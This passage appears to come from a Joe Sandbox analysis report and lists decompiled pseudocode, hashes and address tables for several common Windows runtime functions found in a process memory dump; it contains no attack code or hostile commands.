Opcode ID: 9f68317508d057e241409361705284f50a41839171fcf00f64ab94b9ce9c0d3a
Instruction ID: 6d569cee0383ac5bb9eed1d049ce9867d8377cc57815ab314983bda4a71f16ae
Opcode Fuzzy Hash: 9f68317508d057e241409361705284f50a41839171fcf00f64ab94b9ce9c0d3a
Instruction Fuzzy Hash: 4431C03AA01615DFE728CF29C841A7BBBF5EF46700B09816EE859DB390E730D840D790

Uniqueness

Uniqueness Score: -1.00%

Function 036EC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E036EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E036E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03798D34(_v8, _t80);
					}
					E036E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E036DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03798833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E036DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0370B180();
						if(_a4 != 0) {
							E036E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E036EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E036EBB2D(_t16, _t15);
						E036EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E036DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E036DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E036DFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x036ec18d
0x036ec18f
0x036ec191
0x036ec19b
0x036ec1a0
0x036ec1d4
0x036ec1de
0x03732d6e
0x036ec1e4
0x036ec1e4
0x036ec1e4
0x036ec1ec
0x03732d7d
0x03732d7d
0x036ec1f3
0x036ec1ff
0x03732d88
0x03732d8d
0x03732d94
0x03732d94
0x03732d9f
0x03732da4
0x03732dab
0x03732db0
0x03732db2
0x03732db3
0x03732db4
0x03732dbc
0x03732dc3
0x03732dc3
0x036ec205
0x036ec205
0x036ec208
0x036ec20e
0x036ec211
0x036ec216
0x036ec219
0x036ec21f
0x036ec222
0x036ec22c
0x036ec234
0x036ec23a
0x036ec23f
0x036ec245
0x036ec24b
0x036ec251
0x036ec25a
0x036ec276
0x036ec27d
0x036ec27d
0x036ec25c
0x036ec25c
0x00000000
0x036ec25e
0x036ec1a4
0x036ec1aa
0x036ec1b3
0x036ec265
0x036ec26c
0x036ec26c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 976bea3e4cc03d1fecaaaea839ee1d60f5a475bc57550b6ad22477f985138d08
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 44313A76A0264ABED704EBB4C480BE9FB68FF46204F08415ED41C5F341DB346A4ED7A5

Uniqueness

Uniqueness Score: -1.00%

Function 03747016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03747016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x37bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03746B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03746B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E036E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03709AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0370B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L036E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x03747016
0x0374701e
0x0374702b
0x03747033
0x03747037
0x0374703c
0x0374703e
0x03747041
0x03747045
0x0374704a
0x03747050
0x03747055
0x0374705a
0x03747062
0x03747062
0x0374705a
0x03747064
0x03747064
0x03747067
0x03747071
0x03747096
0x0374709b
0x037470a2
0x037470a6
0x037470a7
0x037470ad
0x037470b3
0x037470b6
0x037470bb
0x037470c3
0x037470c3
0x037470c6
0x037470cd
0x037470dd
0x037470e0
0x037470e2
0x037470e2
0x037470ee
0x03747101
0x037470f0
0x037470f9
0x037470f9
0x0374710a
0x0374710e
0x03747112
0x03747117
0x03747118
0x03747118
0x037470bb
0x0374711d
0x03747123
0x03747131
0x03747131
0x03747136
0x0374713d
0x0374713e
0x0374713f
0x0374714a
0x0374714a
0x03747084
0x03747088
0x00000000
0x0374708e
0x0374708e
0x03747092
0x00000000
0x03747092

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a86d5be08199e77158ace546b41f077fe9abf1b56ac34076e725f713fb92e1e
Instruction ID: f7c743fbc018f8b76858960b2994e6f10252c165c6d5d01b096cefaa947c5885
Opcode Fuzzy Hash: 9a86d5be08199e77158ace546b41f077fe9abf1b56ac34076e725f713fb92e1e
Instruction Fuzzy Hash: 3231D7766057959FC325DF68C840A6AB3E5FFC8700F044A2DF8A59B790E730E904C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 03773D40 Relevance: .1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E03773D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x37bd360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E036E2280(_t34, 0x37b8a6c);
				_t64 =  *0x37b5768; // 0x77575768
				if(_t64 != 0x37b5768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77575770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E036DFFB0(_t53, _t64, 0x37b8a6c);
						 *0x37bb1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E036E2280(_t45, 0x37b8a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x37b5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E036DFFB0(_t51, _t64, 0x37b8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0370B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x03773d40
0x03773d48
0x03773d52
0x03773d59
0x03773d5d
0x03773d61
0x03773d63
0x03773d67
0x03773d69
0x03773d72
0x03773d76
0x03773d7a
0x03773d7f
0x03773d8b
0x03773d91
0x03773d91
0x03773d91
0x03773d94
0x03773d96
0x03773d9d
0x03773da1
0x03773db0
0x03773dba
0x03773dbc
0x03773dbc
0x03773dc6
0x03773dcb
0x03773dcf
0x03773dd1
0x03773dd4
0x00000000
0x00000000
0x03773dd9
0x03773e0c
0x03773e0c
0x03773e0f
0x03773ddb
0x03773ddb
0x03773de0
0x00000000
0x03773de2
0x03773de2
0x03773de4
0x03773de8
0x03773deb
0x03773df1
0x00000000
0x03773df3
0x03773df3
0x03773df5
0x03773df8
0x03773dfa
0x00000000
0x03773dfa
0x03773df1
0x03773de0
0x03773e11
0x03773e11
0x00000000
0x03773dfe
0x03773e04
0x03773e06
0x00000000
0x03773e06
0x00000000
0x03773e04
0x03773d91
0x03773e15
0x03773e1a
0x03773e1f
0x03773e1f
0x03773e23
0x03773e29
0x00000000
0x00000000
0x03773e2e
0x00000000
0x03773e30
0x03773e30
0x03773e35
0x00000000
0x03773e37
0x03773e3e
0x03773e42
0x03773e48
0x03773e4e
0x00000000
0x03773e4e
0x03773e35
0x00000000
0x03773e2e
0x03773e5b
0x03773e5c
0x03773e5d
0x03773e68
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3f39f77db8d1da41c41477622184ac69c51c19cd4beb47e5cb3675a7e2ad2e
Instruction ID: b3bd07d377a3fdbb74b9dafdd8eec5a2e9220ff249f0e934bbdf37d620502e1d
Opcode Fuzzy Hash: 4c3f39f77db8d1da41c41477622184ac69c51c19cd4beb47e5cb3675a7e2ad2e
Instruction Fuzzy Hash: B43168B9609302DFCB14DF14D58095ABBF5FF85610F0889AEE4989F241D770D904CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 036FA70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E036FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x37b7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x37b7b10 = 8;
					 *0x37b7b14 = 0x37b7b0c;
					 *0x37b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E036FA990(0x37b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L036FA840(__edx, __ecx, __ecx, _t52, 0x37b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x37b7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x37b7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x37b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L036E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x37b7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0370F3E0(_t50,  *0x37b7b14, _t8 >> 3);
						_t28 =  *0x37b7b14; // 0x77577b0c
						__eflags = _t28 - 0x37b7b0c;
						if(_t28 != 0x37b7b0c) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x37b7b14 = _t50;
						_t48 = _v12;
						 *0x37b7b10 = _t9;
						goto L6;
					}
					 *0x37b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x036fa713
0x036fa714
0x036fa717
0x036fa71d
0x036fa720
0x036fa722
0x036fa727
0x036fa74a
0x036fa754
0x036fa75e
0x036fa768
0x036fa76a
0x036fa773
0x036fa78b
0x036fa790
0x036fa792
0x036fa741
0x036fa741
0x036fa743
0x036fa749
0x036fa749
0x036fa732
0x036fa73a
0x036fa797
0x036fa79d
0x036fa7a3
0x036fa7a9
0x036fa7b6
0x036fa7bc
0x036fa7ca
0x036fa7e0
0x036fa7e2
0x036fa7e4
0x03739bf2
0x00000000
0x03739bf2
0x036fa7ed
0x036fa7f2
0x036fa800
0x036fa805
0x036fa80d
0x036fa812
0x03739c08
0x03739c08
0x036fa818
0x036fa81b
0x036fa821
0x036fa824
0x00000000
0x036fa824
0x036fa7ae
0x00000000
0x036fa7ae
0x036fa73c
0x036fa73e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e089d705c04bf5fa0949fdd7ffe0bf468d1c000e7e9920b07deda2ecaacd91f8
Instruction ID: 7b5d0a6679b0f56032677fafc8fcd22351e1f1cfd5ace2c283cdbda773e430b8
Opcode Fuzzy Hash: e089d705c04bf5fa0949fdd7ffe0bf468d1c000e7e9920b07deda2ecaacd91f8
Instruction Fuzzy Hash: A631EFB5220280DFCB19DB58D881F6AB7FAFFC5710F14895AE1198B744E7B4A901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 036CAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E036CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x37bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x37b7b9c; // 0x0
					_t53 = L036E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0370B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0370F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L036D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E036F5E50(0x36ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E036FB230(_v32, _v28, 0x36ac2d8, 1,  &_v24);
								_t28 = E036CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x036caa25
0x036caa29
0x036caa2d
0x036caa30
0x036caa37
0x036caa3c
0x03724458
0x03724458
0x03724472
0x03724474
0x03724476
0x036caa64
0x036caa74
0x0372447c
0x03724483
0x03724492
0x036caa52
0x036caa54
0x036caa5e
0x037244a8
0x037244ad
0x037244af
0x037244b6
0x037244b6
0x037244b9
0x037244bc
0x037244cd
0x037244d3
0x037244d6
0x037244e1
0x037244e1
0x037244e6
0x037244e8
0x037244fb
0x037244fb
0x037244e8
0x00000000
0x036caa5e
0x03724476
0x036caa42
0x036caa46
0x036caa48
0x036caa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86810fbf633454d83ab35f5eb01e7426b03443372bb662fe7a89bdf6fb2bf729
Instruction ID: b3c54296b5968b70614b68ba9428aa6d74ed44bcda55e92d398cb64543140a22
Opcode Fuzzy Hash: 86810fbf633454d83ab35f5eb01e7426b03443372bb662fe7a89bdf6fb2bf729
Instruction Fuzzy Hash: B931CE71A00269AFCF15EFA9CD81A7FB7B8EF04700B05406DF901EB240EB749A11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 036F61A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E036F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E036F5E50(0x36a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03799D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E036CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x036f61b3
0x036f61b5
0x036f61bd
0x036f61c3
0x036f61c7
0x036f61d2
0x036f61ff
0x036f61ff
0x036f6201
0x036f6207
0x036f6207
0x036f61d4
0x036f61d9
0x00000000
0x00000000
0x036f61df
0x036f61e2
0x00000000
0x00000000
0x036f61e6
0x036f61e8
0x036f61ee
0x036f61ee
0x036f61f9
0x0373762f
0x03737632
0x03737635
0x03737639
0x03737640
0x0373766e
0x03737675
0x00000000
0x00000000
0x03737681
0x03737689
0x0373768d
0x03737691
0x03737695
0x03737699
0x037376af
0x037376b5
0x037376b7
0x037376b7
0x037376d7
0x037376dc
0x00000000
0x037376dc
0x037376a2
0x037376a9
0x03737651
0x03737653
0x03737653
0x03737656
0x03737656
0x00000000
0x03737656
0x03737644
0x03737646
0x03737648
0x03737648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3703656af63254e33ea8e670e4bb0fb78ad7495b2c3212dfbca35101965f33
Instruction ID: 1814ac8a91afbdb98c40d1c9d05ff3b3a2910ab7bda8e48ae81911b70c4dafd1
Opcode Fuzzy Hash: 3a3703656af63254e33ea8e670e4bb0fb78ad7495b2c3212dfbca35101965f33
Instruction Fuzzy Hash: 053178B1605741CFD324DF09C950B2AFBE4EB88B00F09496DE9989B352E7B0E804CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03704A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03704A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x37bd360 ^ _t62;
				_v8 =  *0x37bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E036E2280(_t26, 0x37b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E036DFFB0(_t41, _t51, 0x37b8608);
						L2:
						 *0x37bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0370B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E036E2280(_t28, 0x37b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E036DFFB0(_t42, _t53, 0x37b8608);
							if(_t53 != 0) {
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E036DFFB0(_t41, _t51, 0x37b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03704a2c
0x03704a34
0x03704a3c
0x03704a3e
0x03704a48
0x03704a4b
0x03704a4d
0x03704a51
0x03704a9c
0x00000000
0x00000000
0x03704aa3
0x03704aa8
0x03704aad
0x03704ab1
0x03704ade
0x03704ae3
0x03704a5a
0x03704a62
0x03704a6a
0x03704a6e
